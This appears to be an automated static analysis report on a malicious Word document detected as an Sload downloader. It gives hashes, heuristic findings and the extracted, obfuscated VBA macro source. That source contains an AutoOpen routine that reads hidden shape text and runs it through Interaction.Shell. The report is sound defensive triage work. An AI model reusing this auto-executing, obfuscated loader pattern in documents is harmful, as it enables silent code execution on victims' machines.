Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 42b38d6c73c0bb6a…

MALICIOUS

Office (OLE)

128.9 KB Created: 2018-12-06 07:15:00 Authoring application: Microsoft Office Word First seen: 2019-05-10
MD5: d08259d92006646d3510155a2f69c832 SHA-1: 5117f9527cb681a2c0c36ecb754b2adfec1ea2c1 SHA-256: 42b38d6c73c0bb6afc33bb463940a94e728416f09e78dc9f2d2ed82dca5a2c7a
252 Risk Score

Heuristics 9

  • ClamAV: Doc.Downloader.Sload-6775542-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Sload-6775542-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
       KJYQfipkHnoFHZDRbr = 84093595 * CInt(189267643) + DADtKEUwPvkjTQXPQHfrmHsX + CLng(182491791 + Sgn(zJQEsHBUHJVXUZU) - 251520711 * 295610636) - DYoJfBKjhlMwIfREFLiKDcf + Chr(JOutnFWAOATDRqdOuIaQHKBp) * 41130065 / CStr(108257227) / (JDiobtpzQHRwbOLiHM / 94348115 / OhTPvBPrwNEmWkMwfMrJcq / Fix(HcLzBvctdrdGckTs + Hex(izADCiZqBOCvUEKXULn) + 231666405 + CBool(14744229 + vVUavsikMMTRfipJ)))
mIAjawInT = Array(HYfJXRBf, bjjLQCpb, ZfiLG, Interaction.Shell(ZHMdA, zOstnFAqbBw), ztMPvVRH)
   ckLzLukvhVpzPJqbLSnzhwPa = 29569996 * CInt(321984377) + mdJoQUibBXOwhX + CLng(129677749 + Sgn(tTUuCLvaLnuOjVk) - 308824468 * 98752916) - zSXhZchhpDzUFaNpVHjCAbh + Chr(cdaTvjnTjpZAjMusNUVsc) * 277843252 / CStr(222639096) / (BqAdLMrVlnEwCNlIQi / 249227514 / AMGJNrpfFpHmvFSEf / Fix(IWzDPvHzqziMbwER + Hex(ojrPUWMQwjRAwvhdGW) + 98467020 + CBool(119174579 + zLBPAqwsNIidldUounAlnTPq)))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
Sub autoopen()
AZzwmnfWS
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5733 bytes
SHA-256: 8d9ade891b31641ceaa8e32ccf5959b45ad0c2a76e1e81b0f4cd198916d2d0e4
Detection
ClamAV: No threats found
Obfuscation or payload: likely
131 of 170 identifiers look randomly generated (e.g. 'YjilRXHqLuAozcpMrbWGBKwB') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "kskHBUI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
AZzwmnfWS
End Sub

Attribute VB_Name = "oZwPEjtiP"
Function AZzwmnfWS()
On Error Resume Next
   rEiFKHsjbvDXYMbjRYEhaaQ = 138031023 * CInt(203175319) + unLDWMwEMIRzqInn + CLng(297745753 + Sgn(waUXwsCawzURoNazNEU) - 156607557 * 161140919) - ZTASOThwumhoYEpWrSBwQBj + Chr(UEXquiTVCEBBXdijsAChkzo) * 147064525 / CStr(66588894) / (NBWcbXjFwKwrBLTLlUCozNo / 117288181 / PwBKUPAjDVRwad / Fix(RRiTmBwqOYNUTVrzNEZL + Hex(hvivvLwqCNLqYXijViB) + 113666074 + CBool(50156467 + mHujKMVEtBSEjWAYrqAALL)))
   CBsAdlnWSEQkBNVUpRG = 269726498 * CInt(202908265) + EnzjrblMczhcQK + CLng(201155540 + Sgn(SwZNHLHFssksDwvmuAwFD) - 321879945 * 301614596) - lFcTCYwLpEzKPQut + Chr(sozqsJfBviQNZiVCNcBj) * 265401563 / CStr(20487091) / (vYCwzlXdFDZLIuVtww / 118069573 / pfzQWdHBotKroTD / Fix(pKiPYFLKzXMHrjFmW + Hex(iPamcUdVpLtiWorDDlOCikUn) + 113315000 + CBool(337516110 + AKEnXUspnrDiNlCQz)))
   vmMdKSiSjcniPmzfzhwwF = 159014574 * CInt(71892825) + CbOjLKLCGYQhSvcWfK + CLng(271776495 + Sgn(CfPbsNGtLwbXbraiEzHYRkcr) - 139550925 * 117083650) - DFcTuiKSWMmqzERr + Chr(wtGaVtSjDQiSDYG) * 176458742 / CStr(5237222) / (nifjoQZDWRIJUz / 298734460 / vbLmiLKmrRcATojPwB / Fix(IcPFpBRXAXtwiYhciPOU + Hex(YspWnZjilsNTWktfWVk) + 114843000 + CBool(265097538 + PzVublLBAijBjjZj)))
Set hpPijdM = kskHBUI.Shapes(ozItdCoP + "msoQjGAXul" + rAtzwWj).TextFrame
   ouRRQwFOAHhPTVbEcmzUmoOY = 241258776 * CInt(72011545) + qTffUnbiDbQLKNzvuWXdTv + CLng(121631541 + Sgn(mFoJAfthFGOuUcNcrqYcLbpH) - 261442331 * 295164880) - BMhXuBhtOwSiXhjFDw + Chr(aSIvmcXplLQhVH) * 76987365 / CStr(286829279) / (YjUtmiwdYMAucVlJjS / 8955938 / QuuXLwiwRzWLqPjUiLnkKSN / Fix(WuJpiXmpKwDipwhqA + Hex(LbqpEMpQfXiRiwhdARmsUuLj) + 8728300 + CBool(287734736 + CfhizkKHmahqwANs)))
   IKKBIrlaHHjDXEKdAjP = 330842982 * CInt(113141551) + qARWXhiLYzNIZw + CLng(134477228 + Sgn(JoAZikFcTQOrSIFuIHUJj) - 248396215 * 131904648) - swihpPfMJSXazr + Chr(FvpDGSrtQtSzRdLwX) * 133220826 / CStr(322584178) / (mCYmElCiAkfzRpOOuiNlA / 20949039 / nWQNiwTzGAJfDWCzU / Fix(ItfOVicPzEpGLjjjk + Hex(oYTkjlYwHJKrrjtUs) + 66643753 + CBool(254921472 + BhlSAPJAodwTlnKwwYM)))
ZHMdA = hpPijdM.ContainingRange + QJnMBm + QFwLwQDH + thjXqvDT + sGBwVIbG + tdvNcu + lNtcfq + MsOBIcp + SMfnDsz + ZPTofl + ZzuiiHb
   qqwDQilwqAKFsMH = 255035759 * CInt(67174312) + qjErLjXCnDiMqR + CLng(194912896 + Sgn(dICjOVwkhoLWdQ) - 26779132 * 39971509) - NiYEwiQfOriQdKscoj + Chr(jamUiUKXVBYWzcscjFwfdmEA) * 193575066 / CStr(103861410) / (DiStohFWtbNpkoHvdp / 141650116 / olhJWpDUzWmrTAGtCIkou / Fix(zBWQOqWqaKHjfSw + Hex(WzdkYWpVWkhNsVE) + 217311344 + CBool(267515595 + ljnGbNwGwbjmUowullKJh)))
   AnicboGjNiLUJfdpzDCdi = 235785499 * CInt(125392291) + qFMqmYlahHwzTaBSw + CLng(175854902 + Sgn(LaENdjPzuRwCQTTmVbPtptk) - 255865032 * 13051713) - jVWBkfHqInmrjHXaqJkEf + Chr(znjqihDRqRLuCtatjRua) * 78696410 / CStr(211815179) / (isIWOCaCzDCViV / 301696148 / anqzUfoEdAzdSJFRTnCwZKoP / Fix(OOqAYrYmVTmVifwDE + Hex(OFzjnzlCvTvWQwahFRzEEJY) + 279775810 + CBool(326499888 + SvlIEuVQaKSfbtOWwFrwDo)))
   ZVNuYPCwOJOQrzUlENvX = 314805631 * CInt(224216820) + aMwJjtdqrkkZOG + CLng(186669184 + Sgn(mGXYDinzIXjEjck) - 239302580 * 283691933) - mhbFTDlTXfHaFfcGJ + Chr(XJzsYwAMJYJPAAiwU) * 308571890 / CStr(204613742) / (nUnjLIqiREcZSTMhSuIc / 34181039 / tMJHfGsJKhbcdDW / Fix(jQISuFwkwjnAialCb + Hex(aaZDdjqItuzppJLBNsUn) + 84093760 + CBool(264414550 + ZLzSrikvZBzcvrdnY)))
   JHdIDCPSwwZRcnmcsKzNn = 140832624 * CInt(194786504) + alzjaNqfSzwoiSYLXnKpckvO + CLng(31606565 + Sgn(mfmizndjhRFirlIuwdqzu) - 173992467 * 247615500) - pzLoTqqibqbKsoBILBkGGp + Chr(YjilRXHqLuAozcpMrbWGBKwB) * 67285936 / CStr(185546078) / (msqijAEmHlEYKUAPPsADj / 145093472 / sijiuOihbpqUzVPUntqhbn / Fix(LlAuiJJYBQEzzw + Hex(JXZDdiUADtAXMJqoM) + 37759478 + CBool(180741170 + ztTzYRQoDsYPXWkSHXK)))
   iswCLonjzkHqnvCvR = 293423476 * CInt(50046014) + kHsrRCUIotCoEIwwzE + CLng(139649554 + Sgn(ImUCNKqhzkZFuAiazHl) - 60463012 * 131291512) - rDiSliwFwMXjLwmqdGLn + Chr(DTwtDiXzpTMEcuRT) * 304712343 / CStr(162125172) / (ktlMiKojoIdizjVo / 233957703 / ZiAYHJtLfiDVXjizCPRHNi / Fix(wjpMpOXHGihVqLMlc + Hex(XfFcTltwwdFWcYqTCo) + 124271912 + CBool(324473951 + zHbwmpOrnqdpnq)))
Const zOstnFAqbBw = 0
   KJYQfipkHnoFHZDRbr = 84093595 * CInt(189267643) + DADtKEUwPvkjTQXPQHfrmHsX + CLng(182491791 + Sgn(zJQEsHBUHJVXUZU) - 251520711 * 295610636) - DYoJfBKjhlMwIfREFLiKDcf + Chr(JOutnFWAOATDRqdOuIaQHKBp) * 41130065 / CStr(108257227) / (JDiobtpzQHRwbOLiHM / 94348115 / OhTPvBPrwNEmWkMwfMrJcq / Fix(HcLzBvctdrdGckTs + Hex(izADCiZqBOCvUEKXULn) + 231666405 + CBool(14744229 + vVUavsikMMTRfipJ)))
mIAjawInT = Array(HYfJXRBf, bjjLQCpb, ZfiLG, Interaction.Shell(ZHMdA, zOstnFAqbBw), ztMPvVRH)
   ckLzLukvhVpzPJqbLSnzhwPa = 29569996 * CInt(321984377) + mdJoQUibBXOwhX + CLng(129677749 + Sgn(tTUuCLvaLnuOjVk) - 308824468 * 98752916) - zSXhZchhpDzUFaNpVHjCAbh + Chr(cdaTvjnTjpZAjMusNUVsc) * 277843252 / CStr(222639096) / (BqAdLMrVlnEwCNlIQi / 249227514 / AMGJNrpfFpHmvFSEf / Fix(IWzDPvHzqziMbwER + Hex(ojrPUWMQwjRAwvhdGW) + 98467020 + CBool(119174579 + zLBPAqwsNIidldUounAlnTPq)))
   ilpvJubSNNdfhMsVOrr = 278873680 * CInt(302277912) + fQpROtMttDEtYBFNhmRKBZST + CLng(81914191 + Sgn(czBsAQfmFYFsjhG) - 129913460 * 129196190) - aonqPAJFYjuGzWFGRMr + Chr(DnNmvhIpGkDiFt) * 294330464 / CStr(155962379) / (ljBivswszainZQtcSV / 257791974 / AvirUzofMAEdhlfdpSI / Fix(RuwHZBjTJFmYFwTqBJNwDRjz + Hex(FFolQmANrKGzbSTSUV) + 41866757 + CBool(89906531 + YlRocjELrzOzlUvritTm)))
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.